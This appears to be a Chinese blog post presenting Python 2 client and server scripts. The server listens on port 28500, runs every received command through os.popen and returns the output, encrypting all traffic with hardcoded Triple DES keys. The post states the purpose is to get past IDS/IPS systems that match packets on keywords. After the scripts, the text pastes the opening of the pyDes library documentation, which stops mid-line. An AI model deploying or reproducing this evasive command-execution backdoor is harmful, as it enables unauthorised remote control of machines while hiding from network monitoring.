加密通讯内容过一些检测数据包匹配关键字的ips和ids还是可以的,简单的demo。
client.py
[php]
# client
import socket
import time
import binascii
import base64
import pyDes
import sys
#use des
iv = '2132435465768797'
key = 'aa000000000000000000000002200000000000aa0000000d'
#data = "afuckfucdfadf"
#des
def encrypt(iv, key, data):
iv = binascii.unhexlify(iv)
key = binascii.unhexlify(key)
k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
d = k.encrypt(data)
d = base64.encodestring(d)
return d
def decrypt(iv, key, data):
iv = binascii.unhexlify(iv)
key = binascii.unhexlify(key)
k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
data = base64.decodestring(data)
d = k.decrypt(data)
return d
if __name__ == '__main__':
print sys.argv[1]+sys.argv[2]
print 'client.py ip port'
address = (sys.argv[1], int(sys.argv[2]))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(address)
data =decrypt(iv,key,s.recv(512))
print data
while True:
commond=raw_input()
s.send(encrypt(iv,key,commond))
time.sleep(1)
if(commond=='q'):
exit()
data = decrypt(iv,key,s.recv(9999))
print data.rstrip('\n')
s.close()
server.py
# server
import socket
import subprocess
import os
import time
import binascii
import base64
import pyDes
##use des
iv = '2132435465768797'
key = 'aa000000000000000000000002200000000000aa0000000d'
#data = "aaaaaaaaaaaaaaaaaa"
##use des
def encrypt(iv, key, data):
iv = binascii.unhexlify(iv)
key = binascii.unhexlify(key)
k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
d = k.encrypt(data)
d = base64.encodestring(d)
return d
def decrypt(iv, key, data):
iv = binascii.unhexlify(iv)
key = binascii.unhexlify(key)
k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)
data = base64.decodestring(data)
d = k.decrypt(data)
return d
banner="by \r\n"
address = ('0.0.0.0', 28500)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s = socket.socket()
s.bind(address)
s.listen(5)
ss, addr = s.accept()
def cmd(data,pwds):
if "q" == data.lower():
s.close()
#break;
exit(1)
else:
if data.startswith('cd'):
print '2 pwd is'+pwds
str=pwds+data[3:].replace('\n','')
print 'str is '+str
os.chdir(str)
pwds=os.getcwd()
result=['',pwds]
else:
r=os.popen(data).read()
result=[r,pwds]
return result
def main():
pwds=os.getcwd()
ss.send(encrypt(iv,key,banner+'\r\npath is '+pwds))
while True:
ra =decrypt(iv,key,ss.recv(512))
[r,pwds]=cmd(ra,pwds)
ss.send(encrypt(iv,key,r+pwds))
ss.close()
s.close()
if __name__ == "__main__":
main()
用的是这个库http://twhiteman.netfirms.com/des.html
pyDes.py
#############################################################################
# Documentation #
#############################################################################
# Author: Todd Whiteman
# Date: 16th March, 2009
# Verion: 2.0.0
# License: Public Domain - free to do as you wish
# Homepage: http://twhiteman.netfirms.com/des.html
#
# This is a pure python implementation of the DES encryption algorithm.
# It's pure python to avoid portability issues, since most DES
# implementations are programmed in C (for performance reasons).
#
# Triple DES class is also implemented, utilising the DES base. Triple DES
# is either DES-EDE3 with a 24 byte key, or DES-EDE2 with a 16 byte key.
#
# See the README.txt that should come with this python module for the
# implementation methods used.
#
# Thanks to:
# * David Broadwell for ideas, comments and suggestions.
# * Mario Wolff for pointing out and debugging some triple des CBC errors.
# * Santiago Palladino for providing the PKCS5 padding technique.
# * Shaya for correcting the PAD_PKCS5 triple des CBC errors.
#
"""A pure python implementation of the DES and TRIPLE DES encryption algorithms.
Class initialization
--------------------
pyDes.des(key, [mode], [IV], [pad], [padmode])
pyDes.triple_des(key, [mode], [IV], [pad], [padmode])
key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes
for Triple DES
mode -> Optional argument for encryption type, can be either
pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining)
IV -> Optional Initial Value bytes, must be supplied if using CBC mode.
Length must be 8 bytes.
pad -> Optional argument, set the pad character (PAD_NORMAL) to use during
all encrypt/decrpt operations done with this instance.
padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5)
to use during all encrypt/decrpt operations done with this instance.
I recommend to use PAD_PKCS5 padding, as then you never need to worry about any
padding issues, as the padding can be removed unambiguously upon decrypting
data that was encrypted using PAD_PKCS5 padmode.
Common methods
--------------
encrypt(data, [pad], [padmode])
decrypt(data, [pad], [padmode])
data -> Bytes to be encrypted/decrypted
pad -> Optional argument. Only when using padmode of PAD_NORMAL. For
encryption, adds this characters to the end of the data block when
data is not a multiple of 8 bytes. For decryption, will remove the
trailing characters that match this pad character from the last 8
bytes of the unencrypted data block.
padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL
or PAD_PKCS5). Defaults to PAD_NORMAL.
Example
-------
from pyDes import *
data = "Please encrypt my data"
k = des("DESCRYPT", CBC, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
# For Python3, you'll need to use bytes, i.e.:
# data = b"Please encrypt my data"
# k = des(b"DESCRYPT", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
d = k.encrypt(data)
print "Encrypted: %r" % d
print "Decrypted: %r" % k.decrypt(d)
assert k.decrypt(d, padmode=PAD_PKCS5